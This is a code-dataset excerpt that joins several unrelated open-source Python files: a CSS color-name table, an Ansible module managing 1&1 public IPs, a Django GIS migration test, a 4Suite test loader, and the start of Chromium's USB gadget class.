        # True when neither a file object nor raw data could be obtained.
        return (self.file is None) and (self.data is None)

    def setMimeTypeByName(self, name):
        " Guess the mime type "
        mimetype = mimetypes.guess_type(name)[0]
        if mimetype is not None:
            # NOTE(review): guess_type() is called a second time although
            # its result is already in `mimetype` -- redundant but harmless.
            self.mimetype = mimetypes.guess_type(name)[0].split(";")[0]
def getFile(*a, **kw):
    """Convenience wrapper around pisaFileObject.

    Returns the pisaFileObject, or None when the resource could not be
    loaded (neither raw data nor a readable file object).
    """
    # Renamed the local from `file` to avoid shadowing the builtin.
    result = pisaFileObject(*a, **kw)
    if result.notFound():
        return None
    return result
COLOR_BY_NAME = {
'activeborder': Color(212, 208, 200),
'activecaption': Color(10, 36, 106),
'aliceblue': Color(.941176, .972549, 1),
'antiquewhite': Color(.980392, .921569, .843137),
'appworkspace': Color(128, 128, 128),
'aqua': Color(0, 1, 1),
'aquamarine': Color(.498039, 1, .831373),
'azure': Color(.941176, 1, 1),
'background': Color(58, 110, 165),
'beige': Color(.960784, .960784, .862745),
'bisque': Color(1, .894118, .768627),
'black': Color(0, 0, 0),
'blanchedalmond': Color(1, .921569, .803922),
'blue': Color(0, 0, 1),
'blueviolet': Color(.541176, .168627, .886275),
'brown': Color(.647059, .164706, .164706),
'burlywood': Color(.870588, .721569, .529412),
'buttonface': Color(212, 208, 200),
'buttonhighlight': Color(255, 255, 255),
'buttonshadow': Color(128, 128, 128),
'buttontext': Color(0, 0, 0),
'cadetblue': Color(.372549, .619608, .627451),
'captiontext': Color(255, 255, 255),
'chartreuse': Color(.498039, 1, 0),
'chocolate': Color(.823529, .411765, .117647),
'coral': Color(1, .498039, .313725),
'cornflowerblue': Color(.392157, .584314, .929412),
'cornsilk': Color(1, .972549, .862745),
'crimson': Color(.862745, .078431, .235294),
'cyan': Color(0, 1, 1),
'darkblue': Color(0, 0, .545098),
'darkcyan': Color(0, .545098, .545098),
'darkgoldenrod': Color(.721569, .52549, .043137),
'darkgray': Color(.662745, .662745, .662745),
'darkgreen': Color(0, .392157, 0),
'darkgrey': Color(.662745, .662745, .662745),
'darkkhaki': Color(.741176, .717647, .419608),
'darkmagenta': Color(.545098, 0, .545098),
'darkolivegreen': Color(.333333, .419608, .184314),
'darkorange': Color(1, .54902, 0),
'darkorchid': Color(.6, .196078, .8),
'darkred': Color(.545098, 0, 0),
'darksalmon': Color(.913725, .588235, .478431),
'darkseagreen': Color(.560784, .737255, .560784),
'darkslateblue': Color(.282353, .239216, .545098),
'darkslategray': Color(.184314, .309804, .309804),
'darkslategrey': Color(.184314, .309804, .309804),
'darkturquoise': Color(0, .807843, .819608),
'darkviolet': Color(.580392, 0, .827451),
'deeppink': Color(1, .078431, .576471),
'deepskyblue': Color(0, .74902, 1),
'dimgray': Color(.411765, .411765, .411765),
'dimgrey': Color(.411765, .411765, .411765),
'dodgerblue': Color(.117647, .564706, 1),
'firebrick': Color(.698039, .133333, .133333),
'floralwhite': Color(1, .980392, .941176),
'forestgreen': Color(.133333, .545098, .133333),
'fuchsia': Color(1, 0, 1),
'gainsboro': Color(.862745, .862745, .862745),
'ghostwhite': Color(.972549, .972549, 1),
'gold': Color(1, .843137, 0),
'goldenrod': Color(.854902, .647059, .12549),
'gray': Color(.501961, .501961, .501961),
'graytext': Color(128, 128, 128),
'green': Color(0, .501961, 0),
'greenyellow': Color(.678431, 1, .184314),
'grey': Color(.501961, .501961, .501961),
'highlight': Color(10, 36, 106),
'highlighttext': Color(255, 255, 255),
'honeydew': Color(.941176, 1, .941176),
'hotpink': Color(1, .411765, .705882),
'inactiveborder': Color(212, 208, 200),
'inactivecaption': Color(128, 128, 128),
'inactivecaptiontext': Color(212, 208, 200),
'indianred': Color(.803922, .360784, .360784),
'indigo': Color(.294118, 0, .509804),
'infobackground': Color(255, 255, 225),
'infotext': Color(0, 0, 0),
'ivory': Color(1, 1, .941176),
'khaki': Color(.941176, .901961, .54902),
'lavender': Color(.901961, .901961, .980392),
'lavenderblush': Color(1, .941176, .960784),
'lawngreen': Color(.486275, .988235, 0),
'lemonchiffon': Color(1, .980392, .803922),
'lightblue': Color(.678431, .847059, .901961),
'lightcoral': Color(.941176, .501961, .501961),
'lightcyan': Color(.878431, 1, 1),
'lightgoldenrodyellow': Color(.980392, .980392, .823529),
'lightgray': Color(.827451, .827451, .827451),
'lightgreen': Color(.564706, .933333, .564706),
'lightgrey': Color(.827451, .827451, .827451),
'lightpink': Color(1, .713725, .756863),
'lightsalmon': Color(1, .627451, .478431),
'lightseagreen': Color(.12549, .698039, .666667),
'lightskyblue': Color(.529412, .807843, .980392),
'lightslategray': Color(.466667, .533333, .6),
'lightslategrey': Color(.466667, .533333, .6),
'lightsteelblue': Color(.690196, .768627, .870588),
'lightyellow': Color(1, 1, .878431),
'lime': Color(0, 1, 0),
'limegreen': Color(.196078, .803922, .196078),
'linen': Color(.980392, .941176, .901961),
'magenta': Color(1, 0, 1),
'maroon': Color(.501961, 0, 0),
'mediumaquamarine': Color(.4, .803922, .666667),
'mediumblue': Color(0, 0, .803922),
'mediumorchid': Color(.729412, .333333, .827451),
'mediumpurple': Color(.576471, .439216, .858824),
'mediumseagreen': Color(.235294, .701961, .443137),
'mediumslateblue': Color(.482353, .407843, .933333),
'mediumspringgreen': Color(0, .980392, .603922),
'mediumturquoise': Color(.282353, .819608, .8),
'mediumvioletred': Color(.780392, .082353, .521569),
'menu': Color(212, 208, 200),
'menutext': Color(0, 0, 0),
'midnightblue': Color(.098039, .098039, .439216),
'mintcream': Color(.960784, 1, .980392),
'mistyrose': Color(1, .894118, .882353),
'moccasin': Color(1, .894118, .709804),
'navajowhite': Color(1, .870588, .678431),
'navy': Color(0, 0, .501961),
'oldlace': Color(.992157, .960784, .901961),
'olive': Color(.501961, .501961, 0),
'olivedrab': Color(.419608, .556863, .137255),
'orange': Color(1, .647059, 0),
'orangered': Color(1, .270588, 0),
'orchid': Color(.854902, .439216, .839216),
'palegoldenrod': Color(.933333, .909804, .666667),
'palegreen': Color(.596078, .984314, .596078),
'paleturquoise': Color(.686275, .933333, .933333),
'palevioletred': Color(.858824, .439216, .576471),
'papayawhip': Color(1, .937255, .835294),
'peachpuff': Color(1, .854902, .72549),
'peru': Color(.803922, .521569, .247059),
'pink': Color(1, .752941, .796078),
'plum': Color(.866667, .627451, .866667),
'powderblue': Color(.690196, .878431, .901961),
'purple': Color(.501961, 0, .501961),
'red': Color(1, 0, 0),
'rosybrown': Color(.737255, .560784, .560784),
'royalblue': Color(.254902, .411765, .882353),
'saddlebrown': Color(.545098, .270588, .07451),
'salmon': Color(.980392, .501961, .447059),
'sandybrown': Color(.956863, .643137, .376471),
'scrollbar': Color(212, 208, 200),
'seagreen': Color(.180392, .545098, .341176),
'seashell': Color(1, .960784, .933333),
'sienna': Color(.627451, .321569, .176471),
'silver': Color(.752941, .752941, .752941),
'skyblue': Color(.529412, .807843, .921569),
'slateblue': Color(.415686, .352941, .803922),
'slategray': Color(.439216, .501961, .564706),
'slategrey': Color(.439216, .501961, .564706),
'snow': Color(1, .980392, .980392),
'springgreen': Color(0, 1, .498039),
'steelblue': Color(.27451, .509804, .705882),
'tan': Color(.823529, .705882, .54902),
'teal': Color(0, .501961, .501961),
'thistle': Color(.847059, .74902, .847059),
'threeddarkshadow': Color(64, 64, 64),
'threedface': Color(212, 208, 200),
'threedhighlight': Color(255, 255, 255),
'threedlightshadow': Color(212, 208, 200),
'threedshadow': Color(128, 128, 128),
'tomato': Color(1, .388235, .278431),
'turquoise': Color(.25098, .878431, .815686),
'violet': Color(.933333, .509804, .933333),
'wheat': Color(.960784, .870588, .701961),
'white': Color(1, 1, 1),
'whitesmoke': Color(.960784, .960784, .960784),
'window': Color(255, 255, 255),
'windowframe': Color(0, 0, 0),
'windowtext': Color(0, 0, 0),
'yellow': Color(1, 1, 0),
'yellowgreen': Color(.603922, .803922, .196078)}
| apache-2.0 |
sorenk/ansible | lib/ansible/modules/cloud/oneandone/oneandone_public_ip.py | 14 | 10224 | #!/usr/bin/python
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = '''
---
module: oneandone_public_ip
short_description: Configure 1&1 public IPs.
description:
- Create, update, and remove public IPs.
This module has a dependency on 1and1 >= 1.0
version_added: "2.5"
options:
state:
description:
- Define a public ip state to create, remove, or update.
required: false
default: 'present'
choices: [ "present", "absent", "update" ]
auth_token:
description:
- Authenticating API token provided by 1&1.
required: true
api_url:
description:
- Custom API URL. Overrides the
ONEANDONE_API_URL environement variable.
required: false
reverse_dns:
description:
- Reverse DNS name. maxLength=256
required: false
datacenter:
description:
- ID of the datacenter where the IP will be created (only for unassigned IPs).
required: false
type:
description:
- Type of IP. Currently, only IPV4 is available.
choices: ["IPV4", "IPV6"]
default: 'IPV4'
required: false
public_ip_id:
description:
- The ID of the public IP used with update and delete states.
required: true
wait:
description:
- wait for the instance to be in state 'running' before returning
required: false
default: "yes"
choices: [ "yes", "no" ]
wait_timeout:
description:
- how long before wait gives up, in seconds
default: 600
wait_interval:
description:
- Defines the number of seconds to wait when using the _wait_for methods
default: 5
requirements:
- "1and1"
- "python >= 2.6"
author:
- Amel Ajdinovic (@aajdinov)
- Ethan Devenport (@edevenport)
'''
EXAMPLES = '''
# Create a public IP.
- oneandone_public_ip:
auth_token: oneandone_private_api_key
reverse_dns: example.com
datacenter: US
type: IPV4
# Update a public IP.
- oneandone_public_ip:
auth_token: oneandone_private_api_key
public_ip_id: public ip id
reverse_dns: secondexample.com
state: update
# Delete a public IP
- oneandone_public_ip:
auth_token: oneandone_private_api_key
public_ip_id: public ip id
state: absent
'''
RETURN = '''
public_ip:
description: Information about the public ip that was processed
type: dict
sample: '{"id": "F77CC589EBC120905B4F4719217BFF6D", "ip": "10.5.132.106"}'
returned: always
'''
import os
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.oneandone import (
get_datacenter,
get_public_ip,
OneAndOneResources,
wait_for_resource_creation_completion
)
HAS_ONEANDONE_SDK = True
try:
import oneandone.client
except ImportError:
HAS_ONEANDONE_SDK = False
DATACENTERS = ['US', 'ES', 'DE', 'GB']
TYPES = ['IPV4', 'IPV6']
def _check_mode(module, result):
    """In Ansible check mode, exit immediately reporting *result* as the
    changed flag; otherwise do nothing.
    """
    if not module.check_mode:
        return
    module.exit_json(changed=result)
def create_public_ip(module, oneandone_conn):
    """
    Create new public IP

    module : AnsibleModule object
    oneandone_conn: authenticated oneandone object

    Returns a tuple (changed, public_ip) where `changed` indicates
    whether a public IP was added.
    """
    reverse_dns = module.params.get('reverse_dns')
    datacenter = module.params.get('datacenter')
    ip_type = module.params.get('type')
    wait = module.params.get('wait')
    wait_timeout = module.params.get('wait_timeout')
    wait_interval = module.params.get('wait_interval')

    # BUG FIX: datacenter_id must always be bound.  Previously it was only
    # assigned inside the "if datacenter is not None" branch, so omitting
    # the optional datacenter parameter raised UnboundLocalError at the
    # create_public_ip() call below.
    datacenter_id = None
    if datacenter is not None:
        datacenter_id = get_datacenter(oneandone_conn, datacenter)
        if datacenter_id is None:
            _check_mode(module, False)
            module.fail_json(
                msg='datacenter %s not found.' % datacenter)

    try:
        # In check mode report "would change" and exit before calling the API.
        _check_mode(module, True)
        public_ip = oneandone_conn.create_public_ip(
            reverse_dns=reverse_dns,
            ip_type=ip_type,
            datacenter_id=datacenter_id)

        if wait:
            wait_for_resource_creation_completion(oneandone_conn,
                                                  OneAndOneResources.public_ip,
                                                  public_ip['id'],
                                                  wait_timeout,
                                                  wait_interval)
            # Re-fetch so the returned facts reflect the final state.
            public_ip = oneandone_conn.get_public_ip(public_ip['id'])

        changed = True if public_ip else False

        return (changed, public_ip)
    except Exception as e:
        module.fail_json(msg=str(e))
def update_public_ip(module, oneandone_conn):
    """
    Update a public IP

    module : AnsibleModule object
    oneandone_conn: authenticated oneandone object

    Returns a tuple (changed, public_ip) where `changed` indicates
    whether the public IP was modified.
    """
    reverse_dns = module.params.get('reverse_dns')
    public_ip_id = module.params.get('public_ip_id')
    wait = module.params.get('wait')
    wait_timeout = module.params.get('wait_timeout')
    wait_interval = module.params.get('wait_interval')

    public_ip = get_public_ip(oneandone_conn, public_ip_id, True)
    if public_ip is None:
        _check_mode(module, False)
        module.fail_json(
            msg='public IP %s not found.' % public_ip_id)

    try:
        # In check mode report "would change" and exit before calling the API.
        _check_mode(module, True)
        public_ip = oneandone_conn.modify_public_ip(
            ip_id=public_ip['id'],
            reverse_dns=reverse_dns)

        if wait:
            wait_for_resource_creation_completion(oneandone_conn,
                                                  OneAndOneResources.public_ip,
                                                  public_ip['id'],
                                                  wait_timeout,
                                                  wait_interval)
            # Re-fetch so the returned facts reflect the final state.
            public_ip = oneandone_conn.get_public_ip(public_ip['id'])

        changed = True if public_ip else False

        return (changed, public_ip)
    except Exception as e:
        module.fail_json(msg=str(e))
def delete_public_ip(module, oneandone_conn):
    """
    Delete a public IP

    module : AnsibleModule object
    oneandone_conn: authenticated oneandone object

    Returns a tuple of (changed, info) where 'changed' indicates whether
    any public IP was deleted.
    """
    public_ip_id = module.params.get('public_ip_id')

    # Treat a missing id as a hard failure so the caller notices typos
    # rather than the task silently reporting success.
    target_ip = get_public_ip(oneandone_conn, public_ip_id, True)
    if target_ip is None:
        _check_mode(module, False)
        module.fail_json(
            msg='public IP %s not found.' % public_ip_id)

    try:
        # In check mode a delete is always reported as a change.
        _check_mode(module, True)
        removed = oneandone_conn.delete_public_ip(ip_id=target_ip['id'])
        # Only the id survives deletion, so that is all we report back.
        return (bool(removed), {'id': target_ip['id']})
    except Exception as e:
        module.fail_json(msg=str(e))
def main():
    """Ansible module entry point: parse arguments and dispatch on state."""
    module = AnsibleModule(
        argument_spec=dict(
            # Credentials/endpoint fall back to environment variables so
            # playbooks need not embed secrets.
            auth_token=dict(
                type='str',
                default=os.environ.get('ONEANDONE_AUTH_TOKEN')),
            api_url=dict(
                type='str',
                default=os.environ.get('ONEANDONE_API_URL')),
            public_ip_id=dict(type='str'),
            reverse_dns=dict(type='str'),
            datacenter=dict(
                choices=DATACENTERS,
                default='US'),
            type=dict(
                choices=TYPES,
                default='IPV4'),
            wait=dict(type='bool', default=True),
            wait_timeout=dict(type='int', default=600),
            wait_interval=dict(type='int', default=5),
            state=dict(type='str', default='present', choices=['present', 'absent', 'update']),
        ),
        supports_check_mode=True
    )
    # The 1&1 SDK is an optional dependency; fail cleanly when absent.
    if not HAS_ONEANDONE_SDK:
        module.fail_json(msg='1and1 required for this module')
    if not module.params.get('auth_token'):
        module.fail_json(
            msg='auth_token parameter is required.')
    # Build the API client, honoring a custom endpoint when one is given.
    if not module.params.get('api_url'):
        oneandone_conn = oneandone.client.OneAndOneService(
            api_token=module.params.get('auth_token'))
    else:
        oneandone_conn = oneandone.client.OneAndOneService(
            api_token=module.params.get('auth_token'), api_url=module.params.get('api_url'))
    # Dispatch to the create/update/delete helper matching 'state'.
    # 'absent' and 'update' both require an explicit public_ip_id.
    state = module.params.get('state')
    if state == 'absent':
        if not module.params.get('public_ip_id'):
            module.fail_json(
                msg="'public_ip_id' parameter is required to delete a public ip.")
        try:
            (changed, public_ip) = delete_public_ip(module, oneandone_conn)
        except Exception as e:
            module.fail_json(msg=str(e))
    elif state == 'update':
        if not module.params.get('public_ip_id'):
            module.fail_json(
                msg="'public_ip_id' parameter is required to update a public ip.")
        try:
            (changed, public_ip) = update_public_ip(module, oneandone_conn)
        except Exception as e:
            module.fail_json(msg=str(e))
    elif state == 'present':
        try:
            (changed, public_ip) = create_public_ip(module, oneandone_conn)
        except Exception as e:
            module.fail_json(msg=str(e))
    module.exit_json(changed=changed, public_ip=public_ip)
if __name__ == '__main__':
    main()
| gpl-3.0 |
Batterfii/django | tests/gis_tests/gis_migrations/test_commands.py | 276 | 2723 | from __future__ import unicode_literals
from django.core.management import call_command
from django.db import connection
from django.test import TransactionTestCase, skipUnlessDBFeature
@skipUnlessDBFeature("gis_enabled")
class MigrateTests(TransactionTestCase):
    """
    Tests running the migrate command in Geodjango.
    """
    # Limit the installed apps for these transactional tests to the
    # migrations under test.
    available_apps = ["gis_tests.gis_migrations"]
    def get_table_description(self, table):
        """Return the introspected column description for ``table``."""
        with connection.cursor() as cursor:
            return connection.introspection.get_table_description(cursor, table)
    def assertTableExists(self, table):
        """Assert that ``table`` exists in the test database."""
        with connection.cursor() as cursor:
            self.assertIn(table, connection.introspection.table_names(cursor))
    def assertTableNotExists(self, table):
        """Assert that ``table`` does not exist in the test database."""
        with connection.cursor() as cursor:
            self.assertNotIn(table, connection.introspection.table_names(cursor))
    def test_migrate_gis(self):
        """
        Tests basic usage of the migrate command when a model uses Geodjango
        fields. Regression test for ticket #22001:
        https://code.djangoproject.com/ticket/22001
        It's also used to showcase an error in migrations where spatialite is
        enabled and geo tables are renamed resulting in unique constraint
        failure on geometry_columns. Regression for ticket #23030:
        https://code.djangoproject.com/ticket/23030
        """
        # Make sure the right tables exist
        self.assertTableExists("gis_migrations_neighborhood")
        self.assertTableExists("gis_migrations_household")
        self.assertTableExists("gis_migrations_family")
        # Raster tables are only created on backends with raster support.
        if connection.features.supports_raster:
            self.assertTableExists("gis_migrations_heatmap")
        # Unmigrate everything
        call_command("migrate", "gis_migrations", "zero", verbosity=0)
        # Make sure it's all gone
        self.assertTableNotExists("gis_migrations_neighborhood")
        self.assertTableNotExists("gis_migrations_household")
        self.assertTableNotExists("gis_migrations_family")
        if connection.features.supports_raster:
            self.assertTableNotExists("gis_migrations_heatmap")
        # Even geometry columns metadata
        try:
            GeoColumn = connection.ops.geometry_columns()
        except NotImplementedError:
            # Not all GIS backends have geometry columns model
            pass
        else:
            # No rows for the unmigrated tables may remain in the backend's
            # geometry columns metadata table.
            self.assertEqual(
                GeoColumn.objects.filter(
                    **{'%s__in' % GeoColumn.table_name_col(): ["gis_neighborhood", "gis_household"]}
                ).count(),
                0)
        # Revert the "unmigration"
        call_command("migrate", "gis_migrations", verbosity=0)
| bsd-3-clause |
Pikecillo/genna | external/4Suite-XML-1.0.2/Ft/Lib/TestSuite/TestModule.py | 1 | 6155 | ########################################################################
# $Header: /var/local/cvsroot/4Suite/Ft/Lib/TestSuite/TestModule.py,v 1.9 2006/08/11 15:50:12 jkloth Exp $
"""
Provides the TestModule class for wrapping modules/packages.
Copyright 2006 Fourthought, Inc. (USA).
Detailed license and copyright information: http://4suite.org/COPYRIGHT
Project home, documentation, distributions: http://4suite.org/
"""
import os
from Ft.Lib import ImportUtil
import TestLoader, TestFunction, TestMode, TestCoverage
class TestModule(TestLoader.TestLoader):
    """Test object for a module or package."""
    def __init__(self, name, module, addModes, skipModes, allModes):
        """Wrap `module` (a module or package object) as a loadable test.

        addModes/skipModes are mode-name collections; allModes selects every
        non-skipped mode regardless of addModes.
        """
        TestLoader.TestLoader.__init__(self, name, module.__name__, addModes,
                                       skipModes, allModes)
        self.module = module
        self.modes = self.getModes(addModes, skipModes, allModes)
        # self.path is presumably set by the TestLoader base class -- it is
        # not assigned in this class. TODO confirm against TestLoader.
        loader = ImportUtil.FindLoader(self.path)
        self.isPackage = loader.is_package(self.path)
        return
    def getModes(self, addModes, skipModes, allModes):
        """Return the list of TestMode objects selected by the arguments."""
        # Create the list of modes we will run; a module without an explicit
        # MODES attribute runs under a single default mode.
        modes = getattr(self.module, 'MODES', [TestMode.DefaultMode()])
        run_modes = []
        if allModes:
            # Use whatever modes are not skipped
            for mode in modes:
                if mode.name not in skipModes:
                    run_modes.append(mode)
        else:
            # Use the specified modes that are not also skipped
            for mode in modes:
                if mode.name in addModes and mode.name not in skipModes:
                    run_modes.append(mode)
            # If no specified modes found, use the default
            if not run_modes:
                for mode in modes:
                    if mode.default and mode.name not in skipModes:
                        run_modes.append(mode)
        return run_modes
    def getTests(self):
        """
        Get the test objects contained within this module.
        """
        # If there are no cached results, gather the sub-tests based on
        # the type of module.
        if not self.tests:
            # Get the test function(s) defined in this module
            for name in dir(self.module):
                if name == 'Test': #name.startswith('Test'):
                    obj = getattr(self.module, name)
                    if callable(obj):
                        self.tests.append(TestFunction.TestFunction(obj))
            # If this is a package, get the available modules
            if self.isPackage:
                files = []
                dirs = []
                path = ImportUtil.GetSearchPath(self.path)
                for importer, name, ispkg in ImportUtil.IterModules(path):
                    if ispkg:
                        dirs.append(name)
                    else:
                        files.append(name)
                # Default running order is alphabetical
                dirs.sort()
                files.sort()
                # Let the module manipulate the test lists
                if hasattr(self.module, 'PreprocessFiles'):
                    (dirs, files) = self.module.PreprocessFiles(dirs, files)
                # Add the test lists to our available tests
                # (addModes etc. flow through the inherited addTest -- it is
                # defined on the TestLoader base class; confirm there.)
                for name in dirs + files:
                    self.addTest(name)
            # If this modules defines a CoverageModule, add the coverage
            # start and end functions so coverage brackets the whole run.
            if hasattr(self.module, 'CoverageModule'):
                ignored = None
                if hasattr(self.module,'CoverageIgnored'):
                    ignored = self.module.CoverageIgnored
                ct = TestCoverage.TestCoverage(self.module.CoverageModule,ignored)
                self.tests.insert(0, TestFunction.TestFunction(ct._start))
                self.tests.append(TestFunction.TestFunction(ct._end))
        return self.tests
    def showTests(self, indent):
        """Print a tree of this module's tests, indented by `indent`."""
        if self.isPackage:
            # A package
            print '%s%s%s' % (indent, self.name, os.sep)
            new_indent = indent + ' '*2
            for test in self.getTests():
                test.showTests(new_indent)
        else:
            # A simple module
            print '%s%s' % (indent, self.name)
        return
    def run(self, tester):
        """Run all of this module's tests under each selected mode."""
        # Determine the modes
        tester.startGroup(self.name)
        modes = []
        for mode in self.modes:
            if mode.initialize(tester):
                modes.append(mode)
        if not modes:
            tester.warning("All modes have been skipped")
        for mode in modes:
            mode.start(tester)
            try:
                have_run = 0
                for test in self.getTests():
                    self.runTest(tester, test)
                    have_run = 1
                if not have_run:
                    # NOTE(review): message likely meant "does not define".
                    tester.warning('Module does define any tests')
            finally:
                # Always let the mode clean up, even on interrupt/error.
                mode.finish(tester)
        tester.groupDone()
        return
    def runTest(self, tester, testObject):
        """Run one test, repairing unbalanced group/test state afterwards."""
        # Saved to check for misbehaving tests
        depth = len(tester.groups)
        # Run the test
        try:
            testObject.run(tester)
        except (KeyboardInterrupt, SystemExit):
            raise
        except:
            tester.exception('Unhandled exception in test')
            # Clean up for the interrupted test
            if tester.test:
                tester.testDone()
            while len(tester.groups) > depth:
                tester.groupDone()
            return
        if tester.test:
            tester.warning('Failed to finish test (fixed)')
            tester.testDone()
        # Verify proper group count
        count = len(tester.groups) - depth
        if count < 0:
            tester.error('Closed too many groups')
        elif count > 0:
            tester.warning('Failed to close %d groups (fixed)' % count)
            while count:
                count -= 1
                tester.message('Closing group %s' % tester.groups[-1])
                tester.groupDone()
        return
| gpl-2.0 |
hefen1/chromium | tools/usb_gadget/gadget.py | 54 | 14586 | # Copyright 2014 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Generic USB gadget functionality.
"""
import struct
import usb_constants
class Gadget(object):
  """Basic functionality for a USB device.
  Implements standard control requests assuming that a subclass will handle
  class- or vendor-specific requests.
  """
  def __init__(self, device_desc, fs_config_desc, hs_config_desc):
    """Create a USB gadget device.
    Args:
      device_desc: USB device descriptor.
      fs_config_desc: Low/full-speed device descriptor.
      hs_config_desc: High-speed device descriptor.
    """
    # _speed/_chip are set by Connected() and cleared by Disconnected().
    self._speed = usb_constants.Speed.UNKNOWN
    self._chip = None
    self._device_desc = device_desc
    self._fs_config_desc = fs_config_desc
    self._hs_config_desc = hs_config_desc
    # dict mapping language codes to a dict mapping indexes to strings
    self._strings = {}
    # dict mapping interface numbers to a set of endpoint addresses
    self._active_endpoints = {}
  def GetDeviceDescriptor(self):
    """Return the USB device descriptor."""
    return self._device_desc
  def GetFullSpeedConfigurationDescriptor(self):
    """Return the low/full-speed configuration descriptor."""
    return self._fs_config_desc
  def GetHighSpeedConfigurationDescriptor(self):
    """Return the high-speed configuration descriptor."""
    return self._hs_config_desc
  def GetConfigurationDescriptor(self):
    """Return the configuration descriptor for the current connection speed.
    Raises:
      RuntimeError: If the device is not connected at a known speed.
    """
    if self._speed == usb_constants.Speed.FULL:
      return self._fs_config_desc
    elif self._speed == usb_constants.Speed.HIGH:
      return self._hs_config_desc
    else:
      raise RuntimeError('Device is not connected.')
  def GetSpeed(self):
    """Return the current connection speed (UNKNOWN when disconnected)."""
    return self._speed
  def AddStringDescriptor(self, index, value, lang=0x0409):
    """Add a string descriptor to this device.
    Args:
      index: String descriptor index (matches 'i' fields in descriptors).
      value: The string.
      lang: Language code (default: English).
    Raises:
      ValueError: The index or language code is invalid.
    """
    # Index 0 is reserved for the language table returned by
    # GetStringDescriptor, hence the lower bound of 1.
    if index < 1 or index > 255:
      raise ValueError('String descriptor index out of range.')
    if lang < 0 or lang > 0xffff:
      raise ValueError('String descriptor language code out of range.')
    lang_strings = self._strings.setdefault(lang, {})
    lang_strings[index] = value
  def Connected(self, chip, speed):
    """The device has been connected to a USB host.
    Args:
      chip: USB controller.
      speed: Connection speed.
    """
    self._speed = speed
    self._chip = chip
  def Disconnected(self):
    """The device has been disconnected from the USB host."""
    self._speed = usb_constants.Speed.UNKNOWN
    self._chip = None
    # Forget all endpoint state; it is rebuilt on SET_CONFIGURATION.
    self._active_endpoints.clear()
  def IsConnected(self):
    """Return True while a controller chip is attached."""
    return self._chip is not None
  def ControlRead(self, request_type, request, value, index, length):
    """Handle a read on the control pipe (endpoint zero).
    Args:
      request_type: bmRequestType field of the setup packet.
      request: bRequest field of the setup packet.
      value: wValue field of the setup packet.
      index: wIndex field of the setup packet.
      length: Maximum amount of data the host expects the device to return.
    Returns:
      A buffer to return to the USB host with len <= length on success or
      None to stall the pipe.
    """
    assert request_type & usb_constants.Dir.IN
    # Dispatch on the request type bits; a reserved type falls through and
    # implicitly returns None, which stalls the pipe.
    typ = request_type & usb_constants.Type.MASK
    recipient = request_type & usb_constants.Recipient.MASK
    if typ == usb_constants.Type.STANDARD:
      return self.StandardControlRead(
          recipient, request, value, index, length)
    elif typ == usb_constants.Type.CLASS:
      return self.ClassControlRead(
          recipient, request, value, index, length)
    elif typ == usb_constants.Type.VENDOR:
      return self.VendorControlRead(
          recipient, request, value, index, length)
  def ControlWrite(self, request_type, request, value, index, data):
    """Handle a write to the control pipe (endpoint zero).
    Args:
      request_type: bmRequestType field of the setup packet.
      request: bRequest field of the setup packet.
      value: wValue field of the setup packet.
      index: wIndex field of the setup packet.
      data: Data stage of the request.
    Returns:
      True on success, None to stall the pipe.
    """
    assert not request_type & usb_constants.Dir.IN
    # Same dispatch scheme as ControlRead; unknown types stall implicitly.
    typ = request_type & usb_constants.Type.MASK
    recipient = request_type & usb_constants.Recipient.MASK
    if typ == usb_constants.Type.STANDARD:
      return self.StandardControlWrite(
          recipient, request, value, index, data)
    elif typ == usb_constants.Type.CLASS:
      return self.ClassControlWrite(
          recipient, request, value, index, data)
    elif typ == usb_constants.Type.VENDOR:
      return self.VendorControlWrite(
          recipient, request, value, index, data)
  def SendPacket(self, endpoint, data):
    """Send a data packet on the given endpoint.
    Args:
      endpoint: Endpoint address.
      data: Data buffer.
    Raises:
      ValueError: If the endpoint address is not valid.
      RuntimeError: If the device is not connected.
    """
    if self._chip is None:
      raise RuntimeError('Device is not connected.')
    # The direction bit must be IN (device-to-host) for a send.
    if not endpoint & usb_constants.Dir.IN:
      raise ValueError('Cannot write to non-input endpoint.')
    self._chip.SendPacket(endpoint, data)
  def ReceivePacket(self, endpoint, data):
    """Handle an incoming data packet on one of the device's active endpoints.
    This method should be overridden by a subclass implementing endpoint-based
    data transfers.
    Args:
      endpoint: Endpoint address.
      data: Data buffer.
    """
    pass
  def HaltEndpoint(self, endpoint):
    """Signals a STALL condition to the host on the given endpoint.
    Args:
      endpoint: Endpoint address.
    """
    self._chip.HaltEndpoint(endpoint)
  def StandardControlRead(self, recipient, request, value, index, length):
    """Handle standard control transfers.
    Args:
      recipient: Request recipient (device, interface, endpoint, etc.)
      request: bRequest field of the setup packet.
      value: wValue field of the setup packet.
      index: wIndex field of the setup packet.
      length: Maximum amount of data the host expects the device to return.
    Returns:
      A buffer to return to the USB host with len <= length on success or
      None to stall the pipe.
    """
    if request == usb_constants.Request.GET_DESCRIPTOR:
      # wValue packs the descriptor type (high byte) and index (low byte);
      # wIndex carries the language code for string descriptors.
      desc_type = value >> 8
      desc_index = value & 0xff
      desc_lang = index
      print 'GetDescriptor(recipient={}, type={}, index={}, lang={})'.format(
          recipient, desc_type, desc_index, desc_lang)
      return self.GetDescriptor(recipient, desc_type, desc_index, desc_lang,
                                length)
  def GetDescriptor(self, recipient, typ, index, lang, length):
    """Handle a standard GET_DESCRIPTOR request.
    See Universal Serial Bus Specification Revision 2.0 section 9.4.3.
    Args:
      recipient: Request recipient (device, interface, endpoint, etc.)
      typ: Descriptor type.
      index: Descriptor index.
      lang: Descriptor language code.
      length: Maximum amount of data the host expects the device to return.
    Returns:
      The value of the descriptor or None to stall the pipe.
    """
    # Only string descriptors are served here; other types fall through to
    # None (stall) and are expected to be handled elsewhere.
    if recipient == usb_constants.Recipient.DEVICE:
      if typ == usb_constants.DescriptorType.STRING:
        return self.GetStringDescriptor(index, lang, length)
